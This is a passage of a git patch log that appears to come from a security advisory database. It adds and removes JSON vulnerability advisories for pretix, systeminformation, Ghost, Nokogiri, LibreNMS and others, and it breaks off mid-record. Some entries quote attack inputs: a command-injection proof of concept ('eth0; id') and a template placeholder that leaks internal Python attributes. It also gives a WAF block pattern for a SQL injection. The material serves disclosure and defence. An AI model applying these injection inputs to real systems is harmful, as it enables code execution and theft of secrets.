}, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/c85afbc621b5f0b1afa618627c45f89323eb0154" + }, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/edac35ed4c5466eb63a202575c337d117ddf1c8e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pretix/pretix" + }, + { + "type": "WEB", + "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-627" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:44:45Z", + "nvd_published_at": "2026-02-16T11:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json new file mode 100644 index 0000000000000..6d14735313222 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7h5-55jg-cq2f", + "modified": "2026-02-18T21:45:06Z", + "published": "2026-02-18T21:45:06Z", + "aliases": [ + "CVE-2026-26974" + ], + "summary": "Improper Control of Generation of Code ('Code Injection') in @tygo-van-den-hurk/slyde", + "details": "### Impact\nThis is a **remote code execution (RCE) vulnerability**. Node.js automatically imports `**/*.plugin.{js,mjs}` files including those from `node_modules`, so any malicious package with a `.plugin.js` file could execute arbitrary code when installed or required. **All projects using this loading behavior are affected**, especially those installing untrusted packages.\n\n### Patches\nThe issue has been **patched in v0.0.5**. Users should upgrade to **v0.0.5 or later** to mitigate the vulnerability.\n\n### Workarounds\n- Audit and restrict which packages are installed in `node_modules`.\n\n### References\n- [CWE-94: Improper Control of Generation of Code](https://cwe.mitre.org/data/definitions/94.html) \n- GitHub Security Advisories documentation: [https://docs.github.com/en/code-security/security-advisories](https://docs.github.com/en/code-security/security-advisories)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@tygo-van-den-hurk/slyde" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f" + }, + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:45:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json deleted file mode 100644 index dafc5f9866b7e..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r8p8-qw9w-j9qv", - "modified": "2026-02-16T12:30:25Z", - "published": "2026-02-16T12:30:25Z", - "aliases": [ - "CVE-2026-2415" - ], - "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will be replaced with the buyer's \nname for the final email. This mechanism contained two security-relevant\n bugs:\n\n\n\n * \nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\n\n\n\n\n * \nPlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is {invoice_company}, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. However, we also consider this scenario \nvery unlikely under typical conditions.\n\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:L/U:Red" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" - }, - { - "type": "WEB", - "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-627" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-16T11:15:56Z" - } -} \ No newline at end of file From c14bf0f3db0a55cc372a2339268f4817b619f4b2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:51:51 +0000 Subject: [PATCH 017/174] Publish Advisories GHSA-9c88-49p5-5ggf GHSA-w52v-v783-gw97 --- .../GHSA-9c88-49p5-5ggf.json | 61 +++++++++++++++++ .../GHSA-w52v-v783-gw97.json | 65 +++++++++++++++++++ 2 files changed, 126 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json new file mode 100644 index 0000000000000..530dc0bbbc633 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c88-49p5-5ggf", + "modified": "2026-02-18T21:51:26Z", + "published": "2026-02-18T21:51:26Z", + "aliases": [ + "CVE-2026-26280" + ], + "summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path", + "details": "### Summary\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.\n\n### Details\nIn `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`.\n\n### PoC\n1. Install `systeminformation@5.30.7`\n2. Call `si.wifiNetworks('eth0; id')`\n3. The first call sanitizes input, but if results are empty, the retry executes: `iwlist eth0; id scan`\n\n### Impact\nRemote Code Execution (RCE). Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "systeminformation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.30.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf" + }, + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sebhildebrandt/systeminformation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:51:26Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json new file mode 100644 index 0000000000000..74a6a2ffb3f09 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w52v-v783-gw97", + "modified": "2026-02-18T21:50:23Z", + "published": "2026-02-18T21:50:23Z", + "aliases": [ + "CVE-2026-26980" + ], + "summary": "Ghost has a SQL injection in Content API", + "details": "### Impact\n\nA SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database. \n\n### Vulnerable Versions\n\nThis vulnerability is present in Ghost v3.24.0 to v6.19.0.\n\n### Patches\n\nv6.19.1 contains a fix for this issue.\n\n### Workarounds\n\nThere is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.\n\nAs a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.\n\n### References\n\nWe thank Nicholas Carlini using Claude, Anthropic for disclosing this vulnerability responsibly. \n\n### For more information\nIf you have any questions or comments about this advisory, email us at [security@ghost.org](mailto:security@ghost.org).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ghost" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.24.0" + }, + { + "fixed": "6.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TryGhost/Ghost" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/releases/tag/v6.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:50:23Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2f7e08e7290bcb51e4a5c7dd1b16e03e86d8e65f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:59:30 +0000 Subject: [PATCH 018/174] Publish GHSA-wx95-c6cv-8532 --- .../GHSA-wx95-c6cv-8532.json | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json diff --git a/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json new file mode 100644 index 0000000000000..ddb15dfd85c75 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json @@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx95-c6cv-8532", + "modified": "2026-02-18T21:57:38Z", + "published": "2026-02-18T21:57:38Z", + "aliases": [], + "summary": "Nokogiri does not check the return value from xmlC14NExecute", + "details": "## Summary\n\nNokogiri's CRuby extension fails to check the return value from `xmlC14NExecute` in the method `Nokogiri::XML::Document#canonicalize` and `Nokogiri::XML::Node#canonicalize`. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may allow downstream libraries to accept invalid or incomplete canonicalized XML, which has been demonstrated to enable signature validation bypass in SAML libraries.\n\nJRuby is not affected, as the Java implementation correctly raises `RuntimeError` on canonicalization failure.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.19.1`.\n\n## Severity\n\nThe maintainers have assessed this as **Medium** severity. Nokogiri itself is a parsing library without a clear security boundary related to canonicalization, so the direct impact is that a method returns incorrect data on invalid input. However, this behavior was exploited in practice to bypass SAML signature validation in downstream libraries (see References).\n\n## Credit\n\nThis vulnerability was responsibly reported by HackerOne researcher `d4d`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "nokogiri" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.1" + }, + { + "fixed": "1.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sparklemotion/nokogiri" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-252" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:57:38Z", + "nvd_published_at": null + } +} \ No newline at end of file From 41148b5be8d4f3f61e281f3c7866bdda69576f76 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 22:08:48 +0000 Subject: [PATCH 019/174] Publish Advisories GHSA-5pqf-54qp-32wx GHSA-93fx-g747-695x GHSA-fqx6-693c-f55g GHSA-gqx7-99jw-6fpr --- .../GHSA-5pqf-54qp-32wx.json | 69 ++++++++++++++++++ .../GHSA-93fx-g747-695x.json | 69 ++++++++++++++++++ .../GHSA-fqx6-693c-f55g.json | 70 +++++++++++++++++++ .../GHSA-gqx7-99jw-6fpr.json | 69 ++++++++++++++++++ 4 files changed, 277 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json diff --git a/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json new file mode 100644 index 0000000000000..39b124c867160 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqf-54qp-32wx", + "modified": "2026-02-18T22:07:19Z", + "published": "2026-02-18T22:07:19Z", + "aliases": [ + "CVE-2026-26991" + ], + "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting", + "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section('title', __('Device Groups'))\n@section('content')\n
\n\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n